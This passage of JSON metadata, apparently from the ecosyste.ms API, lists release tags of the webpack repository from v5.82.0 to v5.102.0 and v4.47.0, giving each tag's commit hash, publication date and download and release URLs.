0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.1/manifests"},{"name":"v5.88.0","sha":"1e18b1d1c74e26a84e9adee519c045e2d8ed40a4","kind":"tag","published_at":"2023-06-21T18:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.0/manifests"},{"name":"v5.87.0","sha":"8e0e0eb47d47fe33e4c9ef9bc455d9584f7ea92c","kind":"tag","published_at":"2023-06-14T18:24:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.87.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.87.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.87.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.87.0/manifests"},{"name":"v5.86.0","sha":"2dc8755dc40e24e3ba5760e96738b74990116711","kind":"tag","published_at":"2023-06-07T15:13:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.86.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.86.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.86.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.86.0/manifests"},{"name":"v5.85.1","sha":"f0f0dd548871566c77c69cdf3d00eaf0faf9a5cd","kind":"tag","published_at":"2023-06-05T14:30:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fw